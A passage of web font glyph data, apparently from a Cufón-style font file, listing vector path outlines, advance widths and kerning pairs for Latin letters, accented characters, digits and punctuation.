v0,53,-28,97,-85,97v-19,0,-48,-7,-61,-29r0,96r-31,0r0,-328r31,0xm168,-95v0,-35,-17,-68,-57,-68v-41,0,-57,35,-57,70v0,36,16,70,58,70v42,0,56,-36,56,-72","w":213},{"d":"207,0r-18,0v-24,21,-30,31,-30,42v0,21,30,19,36,5r12,6v-10,17,-24,23,-39,23v-9,0,-33,-1,-33,-30v0,-6,5,-27,40,-46r-147,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29","w":219},{"d":"62,-228r0,94v55,0,129,9,123,-47v6,-55,-68,-47,-123,-47xm28,0r0,-257r113,0v51,0,79,28,79,76v0,48,-28,76,-79,76r-79,0r0,105r-34,0","w":233,"k":{".":64,",":64,"A":27,"\u00c0":27,"\u00c1":27,"\u00c2":27,"\u00c3":27,"\u00c4":27,"\u0100":27,"\u0102":27,"\u0104":27}},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0xm69,-294r0,-20r123,0r0,20r-123,0","w":259},{"d":"27,-112v0,-13,10,-23,23,-23v13,0,23,10,23,23v0,12,-11,23,-23,23v-13,0,-23,-10,-23,-23","w":100},{"d":"184,-186r0,170v0,61,-28,92,-87,92v-35,0,-75,-15,-77,-55r31,0v1,22,28,30,48,30v44,1,61,-37,55,-83v-10,23,-34,34,-58,34v-55,0,-83,-43,-83,-94v0,-44,21,-98,86,-98v24,-1,43,12,56,31r0,-27r29,0xm98,-25v72,0,77,-137,2,-138v-39,0,-55,31,-55,67v0,33,13,71,53,71xm53,-212r37,-52r33,0r38,52r-30,0r-25,-35r-25,35r-28,0","w":206},{"d":"137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm81,-331r18,0v6,20,19,30,40,30v21,0,29,-12,36,-30r18,0v-5,31,-25,50,-57,50v-33,0,-50,-18,-55,-50","w":273},{"d":"45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm44,-226r0,-20r122,0r0,20r-122,0","w":206},{"d":"48,-140v10,47,121,18,121,86v0,45,-41,58,-79,58v-42,0,-77,-17,-79,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-48,-122,-16,-122,-88v0,-37,37,-52,70,-52v42,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23","w":180},{"d":"28,0r0,-257r34,0r0,128r131,-128r44,0r-108,104r112,153r-43,0r-93,-130r-43,40r0,90r-34,0","w":240},{"d":"229,0r-9,-32v-20,27,-52,38,-82,38v-77,0,-123,-62,-123,-129v0,-75,42,-140,123,-140v56,0,101,25,110,85r-34,0v-7,-39,-37,-56,-76,-56v-62,0,-88,54,-88,109v0,54,31,102,88,102v53,0,84,-37,82,-84r-82,0r0,-28r113,0r0,135r-22,0xm87,-280r38,-52r33,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":273},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0xm80,-285r0,-38r33,0r0,38r-33,0xm148,-285r0,-38r32,0r0,38r-32,0","w":259},{"d":"17,0r0,-24r182,0r0,24r-182,0xm17,-98r0,-24r79,0r0,-60r24,0r0,60r79,0r0,24r-79,0r0,61r-24,0r0,-61r-79,0","w":216},{"d":"45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm118,-212r29,-52r38,0r-44,52r-23,0xm62,-212r29,-52r38,0r-44,52r-23,0","w":206},{"d":"188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27xm39,-226r0,-20r123,0r0,20r-123,0","w":193},{"d":"222,-199r-34,120v0,7,3,11,9,11v22,0,50,-43,50,-82v0,-57,-48,-93,-98,-93v-62,0,-109,52,-109,115v0,107,141,153,200,71r23,0v-23,40,-67,63,-113,63v-76,0,-135,-60,-135,-136v0,-74,61,-133,134,-133v67,0,122,46,122,111v0,62,-51,104,-84,104v-14,0,-20,-9,-24,-23v-27,41,-96,25,-96,-33v0,-50,33,-102,84,-102v17,0,33,7,41,29r8,-22r22,0xm151,-182v-33,0,-57,44,-57,75v0,20,13,35,31,35v31,0,55,-46,55,-76v0,-17,-14,-34,-29,-34","w":288},{"d":"236,0r-23,0v-24,21,-30,31,-30,42v0,21,30,19,36,5r11,6v-10,17,-24,23,-39,23v-9,0,-33,-1,-33,-30v0,-6,5,-27,40,-46r-28,-77r-108,0r-29,77r-36,0r101,-257r38,0xm117,-226v-17,38,-29,81,-45,120r87,0","w":233,"k":{"v":6,"V":17,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":9,"\u0174":9,"Y":27,"\u00dd":27,"\u0176":27,"\u0178":27,"w":6,"\u0175":6,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"334,-257r0,148r-25,0r0,-124r-49,124r-16,0r-49,-124r0,124r-24,0r0,-148r37,0r45,113r43,-113r38,0xm140,-257r0,20r-46,0r0,128r-25,0r0,-128r-46,0r0,-20r117,0","w":356},{"d":"84,0r0,-63r-51,0r0,-21r51,0v1,-13,-2,-21,-7,-27r-44,0r0,-22r33,0r-66,-124r39,0r63,127r61,-127r37,0r-64,124r34,0r0,22r-46,0v-4,7,-7,15,-6,27r52,0r0,21r-52,0r0,63r-34,0"},{"d":"62,-228r0,81r77,0r0,25r-77,0r0,93r57,0v23,0,87,-6,87,-101v0,-61,-23,-98,-86,-98r-58,0xm28,0r0,-122r-25,0r0,-25r25,0r0,-110r88,0v79,0,124,40,124,122v0,86,-38,135,-124,135r-88,0","w":253},{"d":"28,0r0,-257r34,0r0,71r136,0r0,-71r34,0r0,257r-34,0r0,-114r-136,0r0,114r-34,0xm62,-143r136,0r0,-23r-136,0r0,23","w":259},{"d":"30,0r0,-257r34,0r0,257r-34,0xm30,-280r31,-52r39,0r-47,52r-23,0","w":93},{"w":100},{"d":"117,-226v-17,38,-29,81,-45,120r87,0xm-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm55,-294r0,-20r123,0r0,20r-123,0","w":233,"k":{"v":6,"V":17,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":9,"\u0174":9,"Y":27,"\u00dd":27,"\u0176":27,"\u0178":27,"w":6,"\u0175":6,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0xm109,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,14,-9,14,-13r-18,0","w":259},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0xm183,-332r-37,52r-33,0r-38,-52r30,0r25,35r26,-35r27,0","w":259},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0"},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm46,-212r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0"},{"d":"117,-226v-17,38,-29,81,-45,120r87,0xm-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm63,-280r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":233,"k":{"v":6,"V":17,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":9,"\u0174":9,"Y":27,"\u00dd":27,"\u0176":27,"\u0178":27,"w":6,"\u0175":6,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"38,-164r0,-93r24,0r0,93r-24,0","w":100},{"d":"45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm50,-212r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":206},{"d":"66,-242r0,56r37,0r0,27r-37,0r0,115v-4,19,18,17,37,17r0,27v-40,0,-68,3,-68,-41r0,-118r-32,0r0,-27r32,0r0,-56r31,0xm47,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,15,-9,15,-13r-19,0","w":113},{"d":"188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27xm84,-212r30,-52r40,0r-47,52r-23,0","w":193},{"d":"48,-217r0,-37r32,0r0,37r-32,0xm116,-217r0,-37r32,0r0,37r-32,0xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27","w":193},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0xm89,-310v0,-22,19,-40,41,-40v22,0,40,18,40,40v0,22,-18,40,-40,40v-22,0,-41,-18,-41,-40xm105,-310v0,14,11,25,25,25v14,0,24,-11,24,-25v0,-14,-10,-24,-24,-24v-14,0,-25,10,-25,24","w":259},{"d":"23,0r0,-257r31,0r0,98v10,-23,37,-31,59,-31v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0xm46,-280r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0"},{"d":"86,0r0,-228r-85,0r0,-29r205,0r0,29r-85,0r0,228r-35,0xm83,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,15,-9,15,-13r-19,0","w":206,"k":{":":40,",":40,"-":46,".":40,";":40,"A":33,"\u00c0":33,"\u00c1":33,"\u00c2":33,"\u00c3":33,"\u00c4":33,"\u0100":33,"\u0102":33,"\u0104":33,"a":40,"\u00e0":40,"\u00e1":40,"\u00e2":40,"\u00e3":40,"\u00e5":40,"\u0101":40,"\u0103":40,"\u0105":40,"e":40,"\u00e8":40,"\u00e9":40,"\u00ea":40,"\u00eb":40,"\u0113":40,"\u0115":40,"\u0117":40,"\u0119":40,"\u011b":40,"o":40,"\u00f2":40,"\u00f3":40,"\u00f4":40,"\u00f5":40,"\u00f6":40,"\u014d":40,"\u014f":40,"\u0151":40,"u":33,"\u00f9":33,"\u00fa":33,"\u00fb":33,"\u00fc":33,"\u0169":33,"\u016b":33,"\u016d":33,"\u016f":33,"\u0171":33,"\u0173":33,"w":40,"\u0175":40,"y":40,"\u00fd":40,"\u00ff":40,"\u0177":40,"c":40,"\u00e7":40,"\u0107":40,"\u0109":40,"\u010b":40,"\u010d":40,"r":33,"\u0155":33,"\u0157":33,"\u0159":33,"s":40,"\u015b":40,"\u015d":40,"\u015f":40,"\u0161":40,"\u0219":40}},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0xm113,-280r31,-52r40,0r-48,52r-23,0","w":259},{"d":"55,-186r0,210v0,39,-24,51,-60,46r0,-26v21,1,30,1,30,-25r0,-205r30,0xm-14,-212r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":79},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm82,-212r31,-52r40,0r-48,52r-23,0"},{"d":"20,71r-24,0v67,-105,64,-228,0,-334r24,0v72,101,76,233,0,334","w":93},{"d":"23,0r0,-191v0,-43,28,-72,71,-72v36,0,75,21,75,63v0,27,-11,47,-38,56v85,21,50,156,-34,148v-5,0,-10,0,-15,-1r0,-27v39,6,66,-16,66,-51v0,-47,-26,-54,-66,-54r0,-25v29,2,54,-8,54,-41v0,-23,-17,-41,-40,-41v-25,0,-42,10,-42,50r0,186r-31,0"},{"d":"30,0r0,-257r34,0r0,257r-34,0xm41,-280r-47,-52r39,0r31,52r-23,0","w":93},{"d":"45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52xm152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36xm40,-226r0,-20r123,0r0,20r-123,0","w":193},{"d":"8,0r0,-29r160,-199r-148,0r0,-29r188,0r0,29r-159,199r163,0r0,29r-204,0xm167,-332r-37,52r-34,0r-37,-52r30,0r25,35r25,-35r28,0","w":219},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm59,-331r18,0v6,20,19,30,40,30v21,0,29,-12,36,-30r18,0v-5,31,-25,50,-57,50v-33,0,-50,-18,-55,-50","w":219},{"d":"55,0r-30,0r0,-186r30,0r0,186xm-13,-212r37,-52r33,0r38,52r-31,0r-24,-35r-26,35r-27,0","w":79},{"d":"48,-172r0,-18v20,1,38,-3,38,-23v0,-14,-12,-22,-28,-22v-20,0,-28,13,-28,31r-25,0v2,-31,21,-51,53,-51v50,0,73,57,28,72v18,7,31,19,31,38v0,32,-28,47,-58,47v-32,0,-58,-18,-58,-51r25,0v0,20,12,31,33,31v18,0,34,-10,34,-26v-1,-24,-21,-30,-45,-28","w":119},{"d":"137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm87,-285r0,-38r33,0r0,38r-33,0xm155,-285r0,-38r32,0r0,38r-32,0","w":273},{"d":"177,-186r0,186r-29,0r0,-30v-14,32,-68,47,-94,21r0,80r-31,0r0,-257r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0"},{"d":"55,0r-30,0r0,-186r30,0r0,186xm-21,-226r0,-20r123,0r0,20r-123,0","w":79},{"d":"45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm93,-212r-47,-52r39,0r31,52r-23,0","w":206},{"d":"116,-188r0,50v30,-2,68,9,67,-25v-1,-33,-37,-24,-67,-25xm92,-50r0,-157v52,0,116,-8,116,45v0,28,-19,39,-42,42r45,70r-26,0r-43,-68r-26,0r0,68r-24,0xm33,-129v0,66,48,115,111,115v62,0,111,-49,111,-115v0,-64,-49,-114,-111,-114v-63,0,-111,50,-111,114xm9,-129v0,-76,61,-134,135,-134v73,0,135,58,135,134v0,77,-62,135,-135,135v-74,0,-135,-58,-135,-135","w":288},{"d":"161,-228r-14,0r-61,124r75,0r0,-124xm-3,0r130,-257r193,0r0,29r-126,0r0,81r118,0r0,29r-118,0r0,89r128,0r0,29r-161,0r0,-75r-88,0r-37,75r-39,0","w":333},{"d":"305,-84r-137,0v-10,60,89,87,103,25r31,0v-9,69,-116,88,-148,27v-22,48,-142,56,-141,-16v0,-42,31,-51,63,-57v45,-9,63,-8,63,-30v0,-25,-22,-28,-42,-28v-26,0,-45,8,-46,35r-31,0v2,-46,37,-62,79,-62v22,0,50,4,62,27v13,-19,37,-27,60,-27v65,0,84,48,84,106xm139,-96v-28,16,-94,2,-94,46v0,20,17,27,36,27v55,0,61,-27,58,-73xm168,-111r104,0v-1,-29,-18,-52,-51,-52v-33,0,-53,22,-53,52","w":313},{"d":"194,-183r-21,24v45,58,17,163,-70,163v-25,0,-44,-7,-59,-20r-22,24r-10,-9r23,-25v-45,-58,-19,-164,68,-164v26,0,46,7,61,21r21,-24xm151,-136r-87,97v39,36,99,10,97,-54v0,-18,-4,-32,-10,-43xm56,-49r87,-98v-38,-35,-101,-10,-98,54v0,17,4,32,11,44","w":206},{"d":"243,-180r-34,0v-8,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74r35,0v-7,64,-47,103,-112,103v-80,0,-119,-59,-119,-134v0,-75,43,-135,122,-135v54,0,98,28,106,83xm152,-323r0,37r-32,0r0,-37r32,0","w":259},{"d":"64,-172r0,-18v20,1,38,-3,38,-23v0,-14,-11,-22,-27,-22v-20,0,-29,13,-29,31r-25,0v2,-31,22,-51,54,-51v50,0,72,57,27,72v18,7,32,19,32,38v0,32,-29,47,-59,47v-32,0,-57,-18,-57,-51r24,0v0,20,12,31,33,31v18,0,34,-10,34,-26v-1,-24,-21,-30,-45,-28xm77,10r157,-271r23,0r-157,271r-23,0xm190,-53r54,0r0,-69xm266,-154r0,100r22,0r0,19r-22,0r0,35r-22,0r0,-35r-72,0r0,-20r76,-99r18,0","w":300},{"d":"137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm84,-280r37,-52r33,0r38,52r-31,0r-25,-35r-25,35r-27,0","w":273},{"d":"45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52xm152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36xm50,-217r0,-37r32,0r0,37r-32,0xm118,-217r0,-37r32,0r0,37r-32,0","w":193},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm108,-280r-48,-52r40,0r31,52r-23,0","w":219},{"d":"90,-255r0,154r-25,0r0,-111r-41,0r0,-18v23,0,43,-5,48,-25r18,0","w":119},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm44,-262r18,0v6,20,19,29,40,29v21,0,29,-11,36,-29r18,0v-5,31,-25,49,-57,49v-33,0,-50,-17,-55,-49"},{"d":"177,-257r-5,27v-22,0,-38,-2,-43,19r-12,49r37,0r-5,25r-36,0v-17,66,-14,207,-88,196r-24,0r5,-27v37,0,44,-3,50,-36r25,-133r-33,0r5,-25r33,0v6,-55,18,-107,91,-95"},{"d":"30,0r0,-257r34,0r0,257r-34,0xm-14,-294r0,-20r122,0r0,20r-122,0","w":93},{"d":"45,-91v0,35,18,68,58,68v41,0,57,-35,57,-70v0,-36,-17,-70,-59,-70v-42,0,-56,36,-56,72xm189,-257r0,257r-30,0v-1,-8,2,-19,-1,-25v-10,21,-33,29,-59,29v-57,0,-86,-45,-86,-98v0,-82,94,-130,146,-67r0,-96r30,0xm207,-206r10,-51r39,0r-27,51r-22,0","w":235},{"d":"45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm48,-262r18,0v6,20,19,29,40,29v21,0,28,-11,35,-29r19,0v-5,31,-25,49,-57,49v-33,0,-50,-17,-55,-49","w":206},{"d":"25,0r0,-257r30,0r0,257r-30,0xm73,-206r10,-51r39,0r-27,51r-22,0","w":101},{"d":"183,-251r0,26v-51,51,-93,145,-98,225r-34,0v6,-86,47,-165,101,-222r-134,0r0,-29r165,0"},{"d":"128,-153r-45,0r-7,54r44,0xm37,0r10,-74r-35,0r0,-25r39,0r7,-54r-36,0r0,-24r40,0r10,-74r25,0r-11,74r45,0r10,-74r25,0r-10,74r32,0r0,24r-35,0r-8,54r33,0r0,25r-37,0r-10,74r-25,0r11,-74r-45,0r-10,74r-25,0"},{"d":"70,-204r0,40r-40,0v-2,-44,-1,-92,40,-93r0,18v-16,0,-21,18,-21,35r21,0","w":100,"k":{"\u2018":34}},{"d":"3,0r70,-98r-65,-88r40,0r44,65r47,-65r36,0r-64,86r72,100r-39,0r-52,-77r-52,77r-37,0","w":186},{"d":"233,-257r-99,152r0,105r-34,0r0,-105r-99,-152r40,0r77,122r76,-122r39,0xm64,-280r38,-52r33,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":233},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0xm116,-280r31,-52r39,0r-47,52r-23,0","w":259},{"d":"86,0r0,-228r-85,0r0,-29r205,0r0,29r-85,0r0,228r-35,0xm83,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,15,-9,15,-13r-19,0","w":206,"k":{":":40,",":40,"-":46,".":40,";":40,"A":33,"\u00c0":33,"\u00c1":33,"\u00c2":33,"\u00c3":33,"\u00c4":33,"\u0100":33,"\u0102":33,"\u0104":33,"a":40,"\u00e0":40,"\u00e1":40,"\u00e2":40,"\u00e3":40,"\u00e5":40,"\u0101":40,"\u0103":40,"\u0105":40,"e":40,"\u00e8":40,"\u00e9":40,"\u00ea":40,"\u00eb":40,"\u0113":40,"\u0115":40,"\u0117":40,"\u0119":40,"\u011b":40,"o":40,"\u00f2":40,"\u00f3":40,"\u00f4":40,"\u00f5":40,"\u00f6":40,"\u014d":40,"\u014f":40,"\u0151":40,"u":33,"\u00f9":33,"\u00fa":33,"\u00fb":33,"\u00fc":33,"\u0169":33,"\u016b":33,"\u016d":33,"\u016f":33,"\u0171":33,"\u0173":33,"w":40,"\u0175":40,"y":40,"\u00fd":40,"\u00ff":40,"\u0177":40,"c":40,"\u00e7":40,"\u0107":40,"\u0109":40,"\u010b":40,"\u010d":40,"r":33,"\u0155":33,"\u0157":33,"\u0159":33,"s":40,"\u015b":40,"\u015d":40,"\u015f":40,"\u0161":40,"\u0219":40}},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0","w":259},{"d":"24,-217r0,-40r40,0v2,44,1,92,-40,93r0,-18v16,0,21,-18,21,-35r-21,0xm90,-217r0,-40r40,0v2,44,1,92,-40,93r0,-18v16,0,21,-18,21,-35r-21,0","w":153},{"d":"188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27xm58,-243v0,-22,18,-40,40,-40v22,0,41,18,41,40v0,22,-19,40,-41,40v-22,0,-40,-18,-40,-40xm74,-243v0,14,10,25,24,25v14,0,24,-11,24,-25v0,-14,-10,-24,-24,-24v-14,0,-24,10,-24,24","w":193},{"d":"229,0r-9,-32v-20,27,-52,38,-82,38v-77,0,-123,-62,-123,-129v0,-75,42,-140,123,-140v56,0,101,25,110,85r-34,0v-7,-39,-37,-56,-76,-56v-62,0,-88,54,-88,109v0,54,31,102,88,102v53,0,84,-37,82,-84r-82,0r0,-28r113,0r0,135r-22,0","w":273},{"d":"5,-101v-4,-62,87,-62,87,-109v0,-15,-13,-25,-30,-25v-22,0,-30,16,-30,35r-24,0v0,-33,22,-55,55,-55v29,0,53,16,53,45v0,50,-75,57,-86,89r84,0r0,20r-109,0","w":119},{"d":"55,0r-30,0r0,-186r30,0r0,186xm24,-212r31,-52r39,0r-47,52r-23,0","w":79},{"d":"329,-257r-69,257r-35,0r-60,-216r-59,216r-36,0r-66,-257r35,0r51,214r58,-214r37,0r58,214r52,-214r34,0xm113,-280r37,-52r33,0r38,52r-31,0r-24,-35r-26,35r-27,0","w":333,"k":{":":6,",":27,".":27,";":6,"A":9,"\u00c0":9,"\u00c1":9,"\u00c2":9,"\u00c3":9,"\u00c4":9,"\u0100":9,"\u0102":9,"\u0104":9,"a":13,"\u00e0":13,"\u00e1":13,"\u00e2":13,"\u00e3":13,"\u00e5":13,"\u0101":13,"\u0103":13,"\u0105":13,"e":21,"\u00e8":21,"\u00e9":21,"\u00ea":21,"\u00eb":21,"\u0113":21,"\u0115":21,"\u0117":21,"\u0119":21,"\u011b":21,"o":21,"\u00f2":21,"\u00f3":21,"\u00f4":21,"\u00f5":21,"\u00f6":21,"\u014d":21,"\u014f":21,"\u0151":21,"u":6,"\u00f9":6,"\u00fa":6,"\u00fb":6,"\u00fc":6,"\u0169":6,"\u016b":6,"\u016d":6,"\u016f":6,"\u0171":6,"\u0173":6,"r":6,"\u0155":6,"\u0157":6,"\u0159":6}},{"d":"144,-53r18,-20r34,27v53,-56,39,-188,-59,-188v-121,1,-120,210,0,211v13,0,24,-2,35,-7xm255,1r-17,21r-40,-31v-17,10,-37,15,-61,15v-82,0,-123,-65,-123,-135v0,-70,41,-134,123,-134v127,0,157,162,84,237","w":273},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0xm145,-280r30,-52r37,0r-43,52r-24,0xm89,-280r29,-52r38,0r-43,52r-24,0","w":259},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0xm158,-287v-25,-1,-58,-31,-69,2r-18,0v5,-22,15,-40,38,-40v26,0,57,32,66,-2r19,0v-2,19,-13,41,-36,40","w":259},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0xm72,-331r18,0v6,20,19,30,40,30v21,0,29,-12,36,-30r18,0v-5,31,-25,50,-57,50v-33,0,-50,-18,-55,-50","w":259},{"d":"184,-186r0,170v0,61,-28,92,-87,92v-35,0,-75,-15,-77,-55r31,0v1,22,28,30,48,30v44,1,61,-37,55,-83v-10,23,-34,34,-58,34v-55,0,-83,-43,-83,-94v0,-44,21,-98,86,-98v24,-1,43,12,56,31r0,-27r29,0xm98,-25v72,0,77,-137,2,-138v-39,0,-55,31,-55,67v0,33,13,71,53,71xm120,-255r0,38r-33,0r0,-38r33,0","w":206},{"d":"8,0r0,-29r160,-199r-148,0r0,-29r188,0r0,29r-159,199r163,0r0,29r-204,0xm129,-323r0,37r-32,0r0,-37r32,0","w":219},{"d":"78,0r0,-40r40,0r0,40r-40,0xm176,-191v1,62,-69,62,-62,128r-30,0v-8,-74,62,-75,60,-131v-2,-26,-18,-42,-44,-42v-35,0,-50,26,-50,59r-30,0v-1,-49,30,-86,80,-86v45,0,76,26,76,72"},{"d":"28,77r0,-360r24,0r0,360r-24,0","w":79},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0","w":219},{"d":"181,-126r-32,0v-5,-23,-20,-37,-46,-37v-44,0,-58,35,-58,72v0,35,16,68,55,68v30,0,47,-17,51,-45r31,0v-7,46,-35,72,-82,72v-57,0,-87,-39,-87,-95v0,-56,29,-99,88,-99v42,0,75,20,80,64","w":193},{"d":"280,0r0,-40r40,0r0,40r-40,0xm160,0r0,-40r40,0r0,40r-40,0xm40,0r0,-40r40,0r0,40r-40,0","w":360},{"d":"30,0r0,-257r34,0r0,257r-34,0xm-6,-280r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":93},{"d":"233,-257r-99,152r0,105r-34,0r0,-105r-99,-152r40,0r77,122r76,-122r39,0xm106,-280r31,-52r39,0r-47,52r-23,0","w":233},{"d":"96,4v-56,-3,-83,-43,-83,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36r30,0v-7,36,-31,59,-69,63v-11,9,-28,27,-26,38v-2,20,30,19,36,5r12,6v-10,17,-24,23,-39,23v-53,0,-32,-57,0,-72xm45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52","w":193},{"d":"209,-182r-32,0v-4,-37,-28,-52,-64,-52v-29,0,-58,11,-58,44v0,63,165,18,165,119v0,55,-53,77,-100,77v-58,0,-107,-29,-107,-91r33,0v0,43,3